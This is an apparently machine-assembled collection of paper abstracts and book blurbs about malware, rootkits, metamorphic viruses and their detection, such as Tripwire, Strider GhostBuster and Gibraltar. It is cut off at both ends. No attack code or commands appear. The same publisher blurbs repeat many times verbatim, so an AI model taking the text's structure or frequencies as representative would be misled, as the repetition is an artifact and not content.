(usually) the base executable version of the operating system itself. The ability to monitor file systems for unauthorized or unexpected changes gives system administrators valuable data for protecting and maintaining their systems. However, in environments of many networked heterogeneous platforms with different policies and software, the task of monitoring changes becomes quite daunting. Tripwire is tool that aids UNIX system administrators and users in monitoring a designated set of files and directories for any changes. Used with system files on a regular (e.g., daily) basis, Tripwire can notify system administrators of corrupted or altered files, so corrective actions may be taken in a timely manner. Tripwire may also be used on user or group files or databases to signal changes. This paper describes the design and implementation of the Tripwire tool. It uses interchangeable “signature” (usually, message digest) routines to identify changes in files, and is highly configurable. Tripwire is no-cost software, available on the Internet, and is currently in use on thousands of machines around the world. --- paper_title: The Art of Computer Virus Research and Defense paper_content: "Of all the computer-related books I've read recently, this one influenced my thoughts about security the most. There is very little trustworthy information about computer viruses. Peter Szor is one of the best virus analysts in the world and has the perfect credentials to write this book."-Halvar Flake, Reverse Engineer, SABRE Security GmbHSymantec's chief antivirus researcher has written the definitive guide to contemporary virus threats, defense techniques, and analysis tools. Unlike most books on computer viruses, The Art of Computer Virus Research and Defense is a reference written strictly for white hats: IT and security professionals responsible for protecting their organizations against malware. Peter Szor systematically covers everything you need to know, including virus behavior and classification, protection strategies, antivirus and worm-blocking techniques, and much more.Szor presents the state-of-the-art in both malware and protection, providing the full technical detail that professionals need to handle increasingly complex attacks. Along the way, he provides extensive information on code metamorphism and other emerging techniques, so you can anticipate and prepare for future threats.Szor also offers the most thorough and practical primer on virus analysis ever published-addressing everything from creating your own personal laboratory to automating the analysis process. This book's coverage includes Discovering how malicious code attacks on a variety of platforms Classifying malware strategies for infection, in-memory operation, self-protection, payload delivery, exploitation, and more Identifying and responding to code obfuscation threats: encrypted, polymorphic, and metamorphic Mastering empirical methods for analyzing malicious code-and what to do with what you learn Reverse-engineering malicious code with disassemblers, debuggers, emulators, and virtual machines Implementing technical defenses: scanning, code emulation, disinfection, inoculation, integrity checking, sandboxing, honeypots, behavior blocking, and much more Using worm blocking, host-based intrusion prevention, and network-level defense strategies © Copyright Pearson Education. All rights reserved. --- paper_title: Rootkits: Subverting the Windows Kernel paper_content: "It's imperative that everybody working in the field of cyber-security read this book to understand the growing threat of rootkits." --Mark Russinovich, editor, Windows IT Pro / Windows & .NET Magazine"This material is not only up-to-date, it defines up-to-date. It is truly cutting-edge. As the only book on the subject, Rootkits will be of interest to any Windows security researcher or security programmer. It's detailed, well researched and the technical information is excellent. The level of technical detail, research, and time invested in developing relevant examples is impressive. In one word: Outstanding." --Tony Bautts, Security Consultant; CEO, Xtivix, Inc."This book is an essential read for anyone responsible for Windows security. Security professionals, Windows system administrators, and programmers in general will want to understand the techniques used by rootkit authors. At a time when many IT and security professionals are still worrying about the latest e-mail virus or how to get all of this month's security patches installed, Mr. Hoglund and Mr. Butler open your eyes to some of the most stealthy and significant threats to the Windows operating system. Only by understanding these offensive techniques can you properly defend the networks and systems for which you are responsible." --Jennifer Kolde, Security Consultant, Author, and Instructor"What's worse than being owned? Not knowing it. Find out what it means to be owned by reading Hoglund and Butler's first-of-a-kind book on rootkits. At the apex the malicious hacker toolset--which includes decompilers, disassemblers, fault-injection engines, kernel debuggers, payload collections, coverage tools, and flow analysis tools--is the rootkit. Beginning where Exploiting Software left off, this book shows how attackers hide in plain sight. "Rootkits are extremely powerful and are the next wave of attack technology. Like other types of malicious code, rootkits thrive on stealthiness. They hide away from standard system observers, employing hooks, trampolines, and patches to get their work done. Sophisticated rootkits run in such a way that other programs that usually monitor machine behavior can't easily detect them. A rootkit thus provides insider access only to people who know that it is running and available to accept commands. Kernel rootkits can hide files and running processes to provide a backdoor into the target machine. "Understanding the ultimate attacker's tool provides an important motivator for those of us trying to defend systems. No authors are better suited to give you a detailed hands-on understanding of rootkits than Hoglund and Butler. Better to own this book than to be owned." --Gary McGraw, Ph.D., CTO, Cigital, coauthor of Exploiting Software (2004) and Building Secure Software (2002), both from Addison-Wesley"Greg and Jamie are unquestionably the go-to experts when it comes to subverting the Windows API and creating rootkits. These two masters come together to pierce the veil of mystery surrounding rootkits, bringing this information out of the shadows. Anyone even remotely interested in security for Windows systems, including forensic analysis, should include this book very high on their must-read list." --Harlan Carvey, author of Windows Forensics and Incident Recovery (Addison-Wesley, 2005)Rootkits are the ultimate backdoor, giving hackers ongoing and virtually undetectable access to the systems they exploit. Now, two of the world's leading experts have written the first comprehensive guide to rootkits: what they are, how they work, how to build them, and how to detect them. Rootkit.com's Greg Hoglund and James Butler created and teach Black Hat's legendary course in rootkits. In this book, they reveal never-before-told offensive aspects of rootkit technology--learn how attackers can get in and stay in for years, without detection.Hoglund and Butler show exactly how to subvert the Windows XP and Windows 2000 kernels, teaching concepts that are easily applied to virtually any modern operating system, from Windows Server 2003 to Linux and UNIX. Using extensive downloadable examples, they teach rootkit programming techniques that can be used for a wide range of software, from white hat security tools to operating system drivers and debuggers.After reading this book, readers will be able to Understand the role of rootkits in remote command/control and software eavesdropping Build kernel rootkits that can make processes, files, and directories invisible Master key rootkit programming techniques, including hooking, runtime patching, and directly manipulating kernel objects Work with layered drivers to implement keyboard sniffers and file filters Detect rootkits and build host-based intrusion prevention software that resists rootkit attacksVisit rootkit.com for code and programs from this book. The site also contains enhancements to the book's text, such as up-to-the-minute information on rootkits available nowhere else. --- paper_title: Modern Operating Systems paper_content: For software development professionals and computer science students, Modern Operating Systems gives a solid conceptual overview of operating system design, including detailed case studies of Unix/Linux and Windows 2000. What makes an operating system modern? According to author Andrew Tanenbaum, it is the awareness of high-demand computer applications--primarily in the areas of multimedia, parallel and distributed computing, and security. The development of faster and more advanced hardware has driven progress in software, including enhancements to the operating system. It is one thing to run an old operating system on current hardware, and another to effectively leverage current hardware to best serve modern software applications. If you don't believe it, install Windows 3.0 on a modern PC and try surfing the Internet or burning a CD. Readers familiar with Tanenbaum's previous text, Operating Systems, know the author is a great proponent of simple design and hands-on experimentation. His earlier book came bundled with the source code for an operating system called Minux, a simple variant of Unix and the platform used by Linus Torvalds to develop Linux. Although this book does not come with any source code, he illustrates many of his points with code fragments (C, usually with Unix system calls). The first half of Modern Operating Systems focuses on traditional operating systems concepts: processes, deadlocks, memory management, I/O, and file systems. There is nothing groundbreaking in these early chapters, but all topics are well covered, each including sections on current research and a set of student problems. It is enlightening to read Tanenbaum's explanations of the design decisions made by past operating systems gurus, including his view that additional research on the problem of deadlocks is impractical except for "keeping otherwise unemployed graph theorists off the streets." It is the second half of the book that differentiates itself from older operating systems texts. Here, each chapter describes an element of what constitutes a modern operating system--awareness of multimedia applications, multiple processors, computer networks, and a high level of security. The chapter on multimedia functionality focuses on such features as handling massive files and providing video-on-demand. Included in the discussion on multiprocessor platforms are clustered computers and distributed computing. Finally, the importance of security is discussed--a lively enumeration of the scores of ways operating systems can be vulnerable to attack, from password security to computer viruses and Internet worms. Included at the end of the book are case studies of two popular operating systems: Unix/Linux and Windows 2000. There is a bias toward the Unix/Linux approach, not surprising given the author's experience and academic bent, but this bias does not detract from Tanenbaum's analysis. Both operating systems are dissected, describing how each implements processes, file systems, memory management, and other operating system fundamentals. Tanenbaum's mantra is simple, accessible operating system design. Given that modern operating systems have extensive features, he is forced to reconcile physical size with simplicity. Toward this end, he makes frequent references to the Frederick Brooks classic The Mythical Man-Month for wisdom on managing large, complex software development projects. He finds both Windows 2000 and Unix/Linux guilty of being too complicated--with a particular skewering of Windows 2000 and its "mammoth Win32 API." A primary culprit is the attempt to make operating systems more "user-friendly," which Tanenbaum views as an excuse for bloated code. The solution is to have smart people, the smallest possible team, and well-defined interactions between various operating systems components. Future operating system design will benefit if the advice in this book is taken to heart. --Pete Ostenson --- paper_title: The Art of Computer Virus Research and Defense paper_content: "Of all the computer-related books I've read recently, this one influenced my thoughts about security the most. There is very little trustworthy information about computer viruses. Peter Szor is one of the best virus analysts in the world and has the perfect credentials to write this book."-Halvar Flake, Reverse Engineer, SABRE Security GmbHSymantec's chief antivirus researcher has written the definitive guide to contemporary virus threats, defense techniques, and analysis tools. Unlike most books on computer viruses, The Art of Computer Virus Research and Defense is a reference written strictly for white hats: IT and security professionals responsible for protecting their organizations against malware. Peter Szor systematically covers everything you need to know, including virus behavior and classification, protection strategies, antivirus and worm-blocking techniques, and much more.Szor presents the state-of-the-art in both malware and protection, providing the full technical detail that professionals need to handle increasingly complex attacks. Along the way, he provides extensive information on code metamorphism and other emerging techniques, so you can anticipate and prepare for future threats.Szor also offers the most thorough and practical primer on virus analysis ever published-addressing everything from creating your own personal laboratory to automating the analysis process. This book's coverage includes Discovering how malicious code attacks on a variety of platforms Classifying malware strategies for infection, in-memory operation, self-protection, payload delivery, exploitation, and more Identifying and responding to code obfuscation threats: encrypted, polymorphic, and metamorphic Mastering empirical methods for analyzing malicious code-and what to do with what you learn Reverse-engineering malicious code with disassemblers, debuggers, emulators, and virtual machines Implementing technical defenses: scanning, code emulation, disinfection, inoculation, integrity checking, sandboxing, honeypots, behavior blocking, and much more Using worm blocking, host-based intrusion prevention, and network-level defense strategies © Copyright Pearson Education. All rights reserved. --- paper_title: Rootkits: Subverting the Windows Kernel paper_content: "It's imperative that everybody working in the field of cyber-security read this book to understand the growing threat of rootkits." --Mark Russinovich, editor, Windows IT Pro / Windows & .NET Magazine"This material is not only up-to-date, it defines up-to-date. It is truly cutting-edge. As the only book on the subject, Rootkits will be of interest to any Windows security researcher or security programmer. It's detailed, well researched and the technical information is excellent. The level of technical detail, research, and time invested in developing relevant examples is impressive. In one word: Outstanding." --Tony Bautts, Security Consultant; CEO, Xtivix, Inc."This book is an essential read for anyone responsible for Windows security. Security professionals, Windows system administrators, and programmers in general will want to understand the techniques used by rootkit authors. At a time when many IT and security professionals are still worrying about the latest e-mail virus or how to get all of this month's security patches installed, Mr. Hoglund and Mr. Butler open your eyes to some of the most stealthy and significant threats to the Windows operating system. Only by understanding these offensive techniques can you properly defend the networks and systems for which you are responsible." --Jennifer Kolde, Security Consultant, Author, and Instructor"What's worse than being owned? Not knowing it. Find out what it means to be owned by reading Hoglund and Butler's first-of-a-kind book on rootkits. At the apex the malicious hacker toolset--which includes decompilers, disassemblers, fault-injection engines, kernel debuggers, payload collections, coverage tools, and flow analysis tools--is the rootkit. Beginning where Exploiting Software left off, this book shows how attackers hide in plain sight. "Rootkits are extremely powerful and are the next wave of attack technology. Like other types of malicious code, rootkits thrive on stealthiness. They hide away from standard system observers, employing hooks, trampolines, and patches to get their work done. Sophisticated rootkits run in such a way that other programs that usually monitor machine behavior can't easily detect them. A rootkit thus provides insider access only to people who know that it is running and available to accept commands. Kernel rootkits can hide files and running processes to provide a backdoor into the target machine. "Understanding the ultimate attacker's tool provides an important motivator for those of us trying to defend systems. No authors are better suited to give you a detailed hands-on understanding of rootkits than Hoglund and Butler. Better to own this book than to be owned." --Gary McGraw, Ph.D., CTO, Cigital, coauthor of Exploiting Software (2004) and Building Secure Software (2002), both from Addison-Wesley"Greg and Jamie are unquestionably the go-to experts when it comes to subverting the Windows API and creating rootkits. These two masters come together to pierce the veil of mystery surrounding rootkits, bringing this information out of the shadows. Anyone even remotely interested in security for Windows systems, including forensic analysis, should include this book very high on their must-read list." --Harlan Carvey, author of Windows Forensics and Incident Recovery (Addison-Wesley, 2005)Rootkits are the ultimate backdoor, giving hackers ongoing and virtually undetectable access to the systems they exploit. Now, two of the world's leading experts have written the first comprehensive guide to rootkits: what they are, how they work, how to build them, and how to detect them. Rootkit.com's Greg Hoglund and James Butler created and teach Black Hat's legendary course in rootkits. In this book, they reveal never-before-told offensive aspects of rootkit technology--learn how attackers can get in and stay in for years, without detection.Hoglund and Butler show exactly how to subvert the Windows XP and Windows 2000 kernels, teaching concepts that are easily applied to virtually any modern operating system, from Windows Server 2003 to Linux and UNIX. Using extensive downloadable examples, they teach rootkit programming techniques that can be used for a wide range of software, from white hat security tools to operating system drivers and debuggers.After reading this book, readers will be able to Understand the role of rootkits in remote command/control and software eavesdropping Build kernel rootkits that can make processes, files, and directories invisible Master key rootkit programming techniques, including hooking, runtime patching, and directly manipulating kernel objects Work with layered drivers to implement keyboard sniffers and file filters Detect rootkits and build host-based intrusion prevention software that resists rootkit attacksVisit rootkit.com for code and programs from this book. The site also contains enhancements to the book's text, such as up-to-the-minute information on rootkits available nowhere else. --- paper_title: Detours: Binary Interception of Win32 Functions paper_content: Innovative systems research hinges on the ability to easily instrument and extend existing operating system and application functionality. With access to appropriate source code, it is often trivial to insert new instrumentation or extensions by rebuilding the OS or application. However, in today's world of commercial software, researchers seldom have access to all relevant source code. ::: ::: We present Detours, a library for instrumenting arbitrary Win32 functions on x86 machines. Detours intercepts Win32 functions by re-writing target function images. The Detours package also contains utilities to attach arbitrary DLLs and data segments (called payloads) to any Win32 binary. ::: ::: While prior researchers have used binary rewriting to insert debugging and profiling instrumentation, to our knowledge, Detours is the first package on any platform to logically preserve the un-instrumented target function (callable through a trampoline) as a subroutine for use by the instrumentation. Our unique trampoline design is crucial for extending existing binary software. ::: ::: We describe our experiences using Detours to create an automatic distributed partitioning system, to instrument and analyze the DCOM protocol stack, and to create a thunking layer for a COM-based OS API. Micro-benchmarks demonstrate the efficiency of the Detours library. --- paper_title: Rootkits: Subverting the Windows Kernel paper_content: "It's imperative that everybody working in the field of cyber-security read this book to understand the growing threat of rootkits." --Mark Russinovich, editor, Windows IT Pro / Windows & .NET Magazine"This material is not only up-to-date, it defines up-to-date. It is truly cutting-edge. As the only book on the subject, Rootkits will be of interest to any Windows security researcher or security programmer. It's detailed, well researched and the technical information is excellent. The level of technical detail, research, and time invested in developing relevant examples is impressive. In one word: Outstanding." --Tony Bautts, Security Consultant; CEO, Xtivix, Inc."This book is an essential read for anyone responsible for Windows security. Security professionals, Windows system administrators, and programmers in general will want to understand the techniques used by rootkit authors. At a time when many IT and security professionals are still worrying about the latest e-mail virus or how to get all of this month's security patches installed, Mr. Hoglund and Mr. Butler open your eyes to some of the most stealthy and significant threats to the Windows operating system. Only by understanding these offensive techniques can you properly defend the networks and systems for which you are responsible." --Jennifer Kolde, Security Consultant, Author, and Instructor"What's worse than being owned? Not knowing it. Find out what it means to be owned by reading Hoglund and Butler's first-of-a-kind book on rootkits. At the apex the malicious hacker toolset--which includes decompilers, disassemblers, fault-injection engines, kernel debuggers, payload collections, coverage tools, and flow analysis tools--is the rootkit. Beginning where Exploiting Software left off, this book shows how attackers hide in plain sight. "Rootkits are extremely powerful and are the next wave of attack technology. Like other types of malicious code, rootkits thrive on stealthiness. They hide away from standard system observers, employing hooks, trampolines, and patches to get their work done. Sophisticated rootkits run in such a way that other programs that usually monitor machine behavior can't easily detect them. A rootkit thus provides insider access only to people who know that it is running and available to accept commands. Kernel rootkits can hide files and running processes to provide a backdoor into the target machine. "Understanding the ultimate attacker's tool provides an important motivator for those of us trying to defend systems. No authors are better suited to give you a detailed hands-on understanding of rootkits than Hoglund and Butler. Better to own this book than to be owned." --Gary McGraw, Ph.D., CTO, Cigital, coauthor of Exploiting Software (2004) and Building Secure Software (2002), both from Addison-Wesley"Greg and Jamie are unquestionably the go-to experts when it comes to subverting the Windows API and creating rootkits. These two masters come together to pierce the veil of mystery surrounding rootkits, bringing this information out of the shadows. Anyone even remotely interested in security for Windows systems, including forensic analysis, should include this book very high on their must-read list." --Harlan Carvey, author of Windows Forensics and Incident Recovery (Addison-Wesley, 2005)Rootkits are the ultimate backdoor, giving hackers ongoing and virtually undetectable access to the systems they exploit. Now, two of the world's leading experts have written the first comprehensive guide to rootkits: what they are, how they work, how to build them, and how to detect them. Rootkit.com's Greg Hoglund and James Butler created and teach Black Hat's legendary course in rootkits. In this book, they reveal never-before-told offensive aspects of rootkit technology--learn how attackers can get in and stay in for years, without detection.Hoglund and Butler show exactly how to subvert the Windows XP and Windows 2000 kernels, teaching concepts that are easily applied to virtually any modern operating system, from Windows Server 2003 to Linux and UNIX. Using extensive downloadable examples, they teach rootkit programming techniques that can be used for a wide range of software, from white hat security tools to operating system drivers and debuggers.After reading this book, readers will be able to Understand the role of rootkits in remote command/control and software eavesdropping Build kernel rootkits that can make processes, files, and directories invisible Master key rootkit programming techniques, including hooking, runtime patching, and directly manipulating kernel objects Work with layered drivers to implement keyboard sniffers and file filters Detect rootkits and build host-based intrusion prevention software that resists rootkit attacksVisit rootkit.com for code and programs from this book. The site also contains enhancements to the book's text, such as up-to-the-minute information on rootkits available nowhere else. --- paper_title: Operating System Interface Obfuscation and the Revealing of Hidden Operations paper_content: Many software security solutions--including malware analyzers, information flow tracking systems, auditing utilities, and host-based intrusion detectors--rely on knowledge of standard system call interfaces to reason about process execution behavior. In this work, we show how a rootkit can obfuscate a commodity kernel's system call interfaces to degrade the effectiveness of these tools. Our attack, called Illusion, allows user-level malware to invoke privileged kernel operations without requiring the malware to call the actual system calls corresponding to the operations. The Illusion interface hides system operations from user-, kernel-, and hypervisor-level monitors mediating the conventional system-call interface. Illusion alters neither static kernel code nor read-only dispatch tables, remaining elusive from tools protecting kernel memory. We then consider the problem of Illusion attacks and augment system call data with kernel-level execution information to expose the hidden kernel operations. We present a Xen-based monitoring system, Sherlock, that adds kernel execution watchpoints to the stream of system calls. Sherlock automatically adapts its sensitivity based on security requirements to remain performant on desktop systems: in normal execution, it adds 1% to 10% overhead to a variety of workloads. --- paper_title: Modern Operating Systems paper_content: For software development professionals and computer science students, Modern Operating Systems gives a solid conceptual overview of operating system design, including detailed case studies of Unix/Linux and Windows 2000. What makes an operating system modern? According to author Andrew Tanenbaum, it is the awareness of high-demand computer applications--primarily in the areas of multimedia, parallel and distributed computing, and security. The development of faster and more advanced hardware has driven progress in software, including enhancements to the operating system. It is one thing to run an old operating system on current hardware, and another to effectively leverage current hardware to best serve modern software applications. If you don't believe it, install Windows 3.0 on a modern PC and try surfing the Internet or burning a CD. Readers familiar with Tanenbaum's previous text, Operating Systems, know the author is a great proponent of simple design and hands-on experimentation. His earlier book came bundled with the source code for an operating system called Minux, a simple variant of Unix and the platform used by Linus Torvalds to develop Linux. Although this book does not come with any source code, he illustrates many of his points with code fragments (C, usually with Unix system calls). The first half of Modern Operating Systems focuses on traditional operating systems concepts: processes, deadlocks, memory management, I/O, and file systems. There is nothing groundbreaking in these early chapters, but all topics are well covered, each including sections on current research and a set of student problems. It is enlightening to read Tanenbaum's explanations of the design decisions made by past operating systems gurus, including his view that additional research on the problem of deadlocks is impractical except for "keeping otherwise unemployed graph theorists off the streets." It is the second half of the book that differentiates itself from older operating systems texts. Here, each chapter describes an element of what constitutes a modern operating system--awareness of multimedia applications, multiple processors, computer networks, and a high level of security. The chapter on multimedia functionality focuses on such features as handling massive files and providing video-on-demand. Included in the discussion on multiprocessor platforms are clustered computers and distributed computing. Finally, the importance of security is discussed--a lively enumeration of the scores of ways operating systems can be vulnerable to attack, from password security to computer viruses and Internet worms. Included at the end of the book are case studies of two popular operating systems: Unix/Linux and Windows 2000. There is a bias toward the Unix/Linux approach, not surprising given the author's experience and academic bent, but this bias does not detract from Tanenbaum's analysis. Both operating systems are dissected, describing how each implements processes, file systems, memory management, and other operating system fundamentals. Tanenbaum's mantra is simple, accessible operating system design. Given that modern operating systems have extensive features, he is forced to reconcile physical size with simplicity. Toward this end, he makes frequent references to the Frederick Brooks classic The Mythical Man-Month for wisdom on managing large, complex software development projects. He finds both Windows 2000 and Unix/Linux guilty of being too complicated--with a particular skewering of Windows 2000 and its "mammoth Win32 API." A primary culprit is the attempt to make operating systems more "user-friendly," which Tanenbaum views as an excuse for bloated code. The solution is to have smart people, the smallest possible team, and well-defined interactions between various operating systems components. Future operating system design will benefit if the advice in this book is taken to heart. --Pete Ostenson --- paper_title: Detecting Kernel-Level Rootkits Using Data Structure Invariants paper_content: Rootkits affect system security by modifying kernel data structures to achieve a variety of malicious goals. While early rootkits modified control data structures, such as the system call table and values of function pointers, recent work has demonstrated rootkits that maliciously modify noncontrol data. Most prior techniques for rootkit detection have focused solely on detecting control data modifications and, therefore, fail to detect such rootkits. This paper presents a novel technique to detect rootkits that modify both control and noncontrol data. The main idea is to externally observe the execution of the kernel during an inference phase and hypothesize invariants on kernel data structures. A rootkit detection phase uses these invariants as specifications of data structure integrity. During this phase, violation of invariants indicates an infection. We have implemented Gibraltar, a prototype tool that infers kernel data structure invariants and uses them to detect rootkits. Experiments show that Gibraltar can effectively detect previously known rootkits, including those that modify noncontrol data structures. --- paper_title: Detecting stealth software with Strider GhostBuster paper_content: Stealth malware programs that silently infect enterprise and consumer machines are becoming a major threat to the future of the Internet. Resource hiding is a powerful stealth technique commonly used by malware to evade detection by computer users and anti-malware scanners. In this paper, we focus on a subclass of malware, termed "ghostware", which hide files, configuration settings, processes, and loaded modules from the operating system's query and enumeration application programming interfaces (APIs). Instead of targeting individual stealth implementations, we describe a systematic framework for detecting multiple types of hidden resources by leveraging the hiding behavior as a detection mechanism. Specifically, we adopt a cross-view diff-based approach to ghostware detection by comparing a high-level infected scan with a low-level clean scan and alternatively comparing an inside-the-box infected scan with an outside-the-box clean scan. We describe the design and implementation of the Strider GhostBuster tool and demonstrate its efficiency and effectiveness in detecting resources hidden by real-world malware such as rootkits, Trojans, and key-loggers. --- paper_title: Metamorphic worm that carries its own morphing engine paper_content: Metamorphic malware changes its internal structure across generations, but its functionality remains unchanged. Well-designed metamorphic malware will evade signature detection. Recent research has revealed techniques based on hidden Markov models (HMMs) for detecting many types of metamorphic malware, as well as techniques for evading such detection. A worm is a type of malware that actively spreads across a network to other host systems. In this project we design and implement a prototype metamorphic worm that carries its own morphing engine. This is challenging, since the morphing engine itself must be morphed across replications, which imposes restrictions on the structure of the worm. Our design employs previously developed techniques to evade detection. We provide test results to confirm that this worm effectively evades signature and HMM-based detection, and we consider possible detection strategies. This worm provides a concrete example that should prove useful for additional metamorphic detection research. --- paper_title: The Art of Computer Virus Research and Defense paper_content: "Of all the computer-related books I've read recently, this one influenced my thoughts about security the most. There is very little trustworthy information about computer viruses. Peter Szor is one of the best virus analysts in the world and has the perfect credentials to write this book."-Halvar Flake, Reverse Engineer, SABRE Security GmbHSymantec's chief antivirus researcher has written the definitive guide to contemporary virus threats, defense techniques, and analysis tools. Unlike most books on computer viruses, The Art of Computer Virus Research and Defense is a reference written strictly for white hats: IT and security professionals responsible for protecting their organizations against malware. Peter Szor systematically covers everything you need to know, including virus behavior and classification, protection strategies, antivirus and worm-blocking techniques, and much more.Szor presents the state-of-the-art in both malware and protection, providing the full technical detail that professionals need to handle increasingly complex attacks. Along the way, he provides extensive information on code metamorphism and other emerging techniques, so you can anticipate and prepare for future threats.Szor also offers the most thorough and practical primer on virus analysis ever published-addressing everything from creating your own personal laboratory to automating the analysis process. This book's coverage includes Discovering how malicious code attacks on a variety of platforms Classifying malware strategies for infection, in-memory operation, self-protection, payload delivery, exploitation, and more Identifying and responding to code obfuscation threats: encrypted, polymorphic, and metamorphic Mastering empirical methods for analyzing malicious code-and what to do with what you learn Reverse-engineering malicious code with disassemblers, debuggers, emulators, and virtual machines Implementing technical defenses: scanning, code emulation, disinfection, inoculation, integrity checking, sandboxing, honeypots, behavior blocking, and much more Using worm blocking, host-based intrusion prevention, and network-level defense strategies © Copyright Pearson Education. All rights reserved. --- paper_title: Evaluation of Android Anti-malware Techniques against Dalvik Bytecode Obfuscation paper_content: Popularity and growth of Android mobile devices has paved the way for exploiting popular apps using various Dalvik byte code transformation methods. Testing the antimalware techniques against obfuscation identifies the need of proposing effective detection methods. In this paper, we explore the resilience of anti-malware techniques against transformations for Android. The Proposed approach employs variable compression, native code wrapping and register renaming, in addition to already implemented transformations on Dalvik byte code. Evaluation results indicate low resilience of the antimalware detection engines against code obfuscation. Furthermore, we evaluate resilience of Androguard's code similarity and AndroSimilar's robust statistical feature signature against code obfuscated malware. --- paper_title: Code mutation techniques by means of formal grammars and automatons paper_content: The paper describes formalization of existing code mutation techniques widely used in a viruses (polymorphism and metamorphism) by means of formal grammars and automatons. New model of metamorphic viruses and new classification of this type of viruses are suggested. The statement about undetectable viruses of this type is proved. In that paper are shown iterative approach toward construct complex formal grammars from the simplest initial rules for building metamorphic generator. Also there are some samples of applied usage of formal grammar model. The experiment for system call tracing of some viruses and worms is described. Possibility of using system call sequences for viruses detecting is shown. --- paper_title: The Art of Computer Virus Research and Defense paper_content: "Of all the computer-related books I've read recently, this one influenced my thoughts about security the most. There is very little trustworthy information about computer viruses. Peter Szor is one of the best virus analysts in the world and has the perfect credentials to write this book."-Halvar Flake, Reverse Engineer, SABRE Security GmbHSymantec's chief antivirus researcher has written the definitive guide to contemporary virus threats, defense techniques, and analysis tools. Unlike most books on computer viruses, The Art of Computer Virus Research and Defense is a reference written strictly for white hats: IT and security professionals responsible for protecting their organizations against malware. Peter Szor systematically covers everything you need to know, including virus behavior and classification, protection strategies, antivirus and worm-blocking techniques, and much more.Szor presents the state-of-the-art in both malware and protection, providing the full technical detail that professionals need to handle increasingly complex attacks. Along the way, he provides extensive information on code metamorphism and other emerging techniques, so you can anticipate and prepare for future threats.Szor also offers the most thorough and practical primer on virus analysis ever published-addressing everything from creating your own personal laboratory to automating the analysis process. This book's coverage includes Discovering how malicious code attacks on a variety of platforms Classifying malware strategies for infection, in-memory operation, self-protection, payload delivery, exploitation, and more Identifying and responding to code obfuscation threats: encrypted, polymorphic, and metamorphic Mastering empirical methods for analyzing malicious code-and what to do with what you learn Reverse-engineering malicious code with disassemblers, debuggers, emulators, and virtual machines Implementing technical defenses: scanning, code emulation, disinfection, inoculation, integrity checking, sandboxing, honeypots, behavior blocking, and much more Using worm blocking, host-based intrusion prevention, and network-level defense strategies © Copyright Pearson Education. All rights reserved. --- paper_title: Hunting for metamorphic paper_content: As virus writers developed numerous polymorphic engines, virus scanners became stronger in their defense against them. A virus scanner which used a code emulator to detect viruses looked like it was on steroids compared to those without an emulator-based scanning engine. Nowadays, most polymorphic viruses are considered boring. Even though they can be extremely hard to detect, most of today’s products are able to deal with them relatively easily. These are the scanners that survived the DOS polymorphic days. For some of the scanners DOS polymorphic viruses meant the ‘end of days’. Other scanners died with the macro virus problem. For most products the next challenge to take is 32-bit metamorphosis. Metamorphic viruses are nothing new. We have seen them in DOS days, though some of them, like ACG, already used 32-bit instructions. The next step is 32-bit metamorphosis under Windows environments. Virus writers already took the first step in that direction. In this paper the authors will examine metamorphic engines to provide a better general understanding of the problem that we are facing. The authors also provide detection examples of some of the metamorphic viruses. --- paper_title: DroidAnalyst: Synergic App Framework for Static and Dynamic App Analysis paper_content: Evolution of mobile devices, availability of additional resources coupled with enhanced functionality has leveraged smartphone to substitute the conventional computing devices. Mobile device users have adopted smartphones for online payments, sending emails, social networking, and stores the user sensitive information. The ever increasing mobile devices has attracted malware authors and cybercriminals to target mobile platforms. Android, the most popular open source mobile OS is being targeted by the malware writers. In particular, less monitored third party markets are being used as infection and propagation sources. Given the threats posed by the increasing number of malicious apps, security researchers must be able to analyze the malware quickly and efficiently; this may not be feasible with the manual analysis. Hence, automated analysis techniques for app vetting and malware detection are necessary. In this chapter, we present DroidAnalyst, a novel automated app vetting and malware analysis framework that integrates the synergy of static and dynamic analysis to improve accuracy and efficiency of analysis. DroidAnalyst generates a unified analysis model that combines the strengths of the complementary approaches with multiple detection methods, to increase the app code analysis. We have evaluated our proposed solution DroidAnalyst against a reasonable dataset consisting real-world benign and malware apps. --- paper_title: The Art of Computer Virus Research and Defense paper_content: "Of all the computer-related books I've read recently, this one influenced my thoughts about security the most. There is very little trustworthy information about computer viruses. Peter Szor is one of the best virus analysts in the world and has the perfect credentials to write this book."-Halvar Flake, Reverse Engineer, SABRE Security GmbHSymantec's chief antivirus researcher has written the definitive guide to contemporary virus threats, defense techniques, and analysis tools. Unlike most books on computer viruses, The Art of Computer Virus Research and Defense is a reference written strictly for white hats: IT and security professionals responsible for protecting their organizations against malware. Peter Szor systematically covers everything you need to know, including virus behavior and classification, protection strategies, antivirus and worm-blocking techniques, and much more.Szor presents the state-of-the-art in both malware and protection, providing the full technical detail that professionals need to handle increasingly complex attacks. Along the way, he provides extensive information on code metamorphism and other emerging techniques, so you can anticipate and prepare for future threats.Szor also offers the most thorough and practical primer on virus analysis ever published-addressing everything from creating your own personal laboratory to automating the analysis process. This book's coverage includes Discovering how malicious code attacks on a variety of platforms Classifying malware strategies for infection, in-memory operation, self-protection, payload delivery, exploitation, and more Identifying and responding to code obfuscation threats: encrypted, polymorphic, and metamorphic Mastering empirical methods for analyzing malicious code-and what to do with what you learn Reverse-engineering malicious code with disassemblers, debuggers, emulators, and virtual machines Implementing technical defenses: scanning, code emulation, disinfection, inoculation, integrity checking, sandboxing, honeypots, behavior blocking, and much more Using worm blocking, host-based intrusion prevention, and network-level defense strategies © Copyright Pearson Education. All rights reserved. --- paper_title: The Art of Computer Virus Research and Defense paper_content: "Of all the computer-related books I've read recently, this one influenced my thoughts about security the most. There is very little trustworthy information about computer viruses. Peter Szor is one of the best virus analysts in the world and has the perfect credentials to write this book."-Halvar Flake, Reverse Engineer, SABRE Security GmbHSymantec's chief antivirus researcher has written the definitive guide to contemporary virus threats, defense techniques, and analysis tools. Unlike most books on computer viruses, The Art of Computer Virus Research and Defense is a reference written strictly for white hats: IT and security professionals responsible for protecting their organizations against malware. Peter Szor systematically covers everything you need to know, including virus behavior and classification, protection strategies, antivirus and worm-blocking techniques, and much more.Szor presents the state-of-the-art in both malware and protection, providing the full technical detail that professionals need to handle increasingly complex attacks. Along the way, he provides extensive information on code metamorphism and other emerging techniques, so you can anticipate and prepare for future threats.Szor also offers the most thorough and practical primer on virus analysis ever published-addressing everything from creating your own personal laboratory to automating the analysis process. This book's coverage includes Discovering how malicious code attacks on a variety of platforms Classifying malware strategies for infection, in-memory operation, self-protection, payload delivery, exploitation, and more Identifying and responding to code obfuscation threats: encrypted, polymorphic, and metamorphic Mastering empirical methods for analyzing malicious code-and what to do with what you learn Reverse-engineering malicious code with 